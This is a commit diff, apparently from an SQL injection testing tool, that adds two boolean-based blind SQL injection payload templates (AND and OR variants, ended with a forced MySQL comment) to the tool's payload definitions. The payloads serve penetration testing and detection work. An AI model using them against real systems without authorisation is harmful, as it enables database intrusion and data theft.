Added payload for forced comments on boolean-based blind injections for WHERE or HAVING clause

2025-07-29 17:39:56 +03:00 · 2017-01-23 18:24:26 +01:00 · 2017-01-23 18:24:26 +01:00 · e6143beeae
commit e6143beeae
parent 16d5e22b72
1 changed files with 32 additions and 0 deletions
--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@ -171,6 +171,22 @@ Tag: <test>
        </response>
    </test>

+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,9</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE] #</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM] #</payload>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison>
+        </response>
+    </test>
+
    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
@ -187,6 +203,22 @@ Tag: <test>
        </response>
    </test>

+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,9</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE] #</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM] #</payload>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1] #</comparison>
+        </response>
+    </test>
+
    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
        <stype>1</stype>